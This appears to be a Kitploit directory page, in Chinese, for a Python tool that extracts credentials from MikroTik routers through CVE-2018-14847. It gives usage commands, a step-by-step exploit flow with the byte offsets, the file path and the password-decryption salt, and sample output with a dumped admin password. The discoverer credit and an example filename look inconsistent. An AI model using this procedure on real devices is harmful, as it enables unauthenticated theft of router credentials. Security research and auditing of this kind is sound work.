Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS — VULNERAVEL CVE-2018-14847 - 使用 Python 提取 MikroTik 凭据 | Kitploit
工具/GitHubGitHub/mourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas
物联网安全密码攻击漏洞分析漏洞利用网络安全红队
GitHubmourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas

VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS

VULNERAVEL CVE-2018-14847 - 使用 Python 提取 MikroTik 凭据

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1293个月前尚未审核

渗透测试工具 — /网络

用于网络审计和渗透测试的脚本仓库。 请仅在获得正式授权的设备上使用。


CVE-2018-14847 — MikroTik Winbox Credential Extractor

描述

利用 MikroTik RouterOS Winbox 服务中的未经身份验证的文件读取漏洞。文件处理程序(处理程序 ID 2)未验证身份,允许外部攻击者读取包含设备所有用户和密码的 user.dat 文件。

密码使用 XOR 加密存储,密钥为 MD5(usuario + "283i4jfkai3389")。该脚本会自动完成解密。

受影响版本

分支受影响至修复版本
Stable6.426.42.1
Long-term6.40.76.40.8
RC6.426.43

要求

  • Python 3.x(无需外部依赖)
  • 目标上端口 8291(Winbox)可访问

用法

root@kitploit:~
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291

示例

root@kitploit:~
# 默认目标端口 8291
python3 cve_2018_14847.py 192.168.1.1

# 自定义端口
python3 cve_2018_14847.py 192.168.1.1 --port 8291

漏洞利用流程

root@kitploit:~
1. 连接到 8291 端口 (Winbox)
        ↓
2. 发送 FIRST_PAYLOAD — 打开会话 + 请求 /flash/rw/store/user.dat
        ↓
3. 从响应的第 38 字节提取 Session ID
        ↓
4. 将 Session ID 注入 SECOND_PAYLOAD 的第 19 字节
        ↓
5. 发送 SECOND_PAYLOAD — 读取 user.dat 文件
        ↓
6. 解析 M2 条目 → 提取用户和加密密码
        ↓
7. 解密密码:XOR 与 MD5(usuario + salt)
        ↓
8. 显示凭据并保存到文件

预期输出

root@kitploit:~
═══════════════════════════════════════════════════════
  CVE-2018-14847  —  MikroTik Winbox Credential Dump
  Unauthenticated File Read + Password Decryption
  受影响版本: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
  目标  : 192.168.1.1:8291
  日期  : 2026-05-20 18:06:58

[*] 正在连接 192.168.1.1:8291 ...
[+] 已连接到 Winbox 服务。
[*] 发送 payload 1(文件请求)...
[+] 收到响应 (84 字节). Session ID: 0x35
[*] 发送 payload 2(读取 user.dat)...
[+] 收到数据 (312 字节).
[*] 正在分析 user.dat (257 字节有效数据) ...

═══════════════════════════════════════════════════════
  提取的凭据
═══════════════════════════════════════════════════════
  用户 : admin
  密码 : senha123
  组合 : admin:senha123
───────────────────────────────────────────────────────
[+] 找到 1 个凭据。
[+] 结果已保存至: mikrotik_1192.168.1.1_20260520_180658.txt

输出文件

结果自动保存至:

root@kitploit:~
mikrotik_<IP>_<TIMESTAMP>.txt

示例: mikrotik_192.168.1.1_20260520_180658.txt

包含:目标IP、日期、CVE、受影响版本以及所有 用户:密码 对。

参考

  • CVE: CVE-2018-14847
  • Exploit-DB: EDB-ID #45170
  • 原始发现者: Omid Shojaei (@Dmitriy_area51)
  • 公开披露: 2018年4月

文件夹结构

root@kitploit:~
/rede/
├── README.md                        # 本文件
├── cve_2018_14847.py                # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md      # CGNAT 渗透测试报告
├── pentest_roteador_192.168.2.1.md  # 路由器渗透测试报告
└── mikrotik_<IP>_<TIMESTAMP>.txt    # 脚本生成的结果

法律声明: 这些工具仅限在授权环境中使用。未经授权对第三方系统执行属于犯罪行为,依据巴西第12.737/2012号法律(卡罗琳娜·迪克曼法)和巴西刑法第154-A条。

下载工具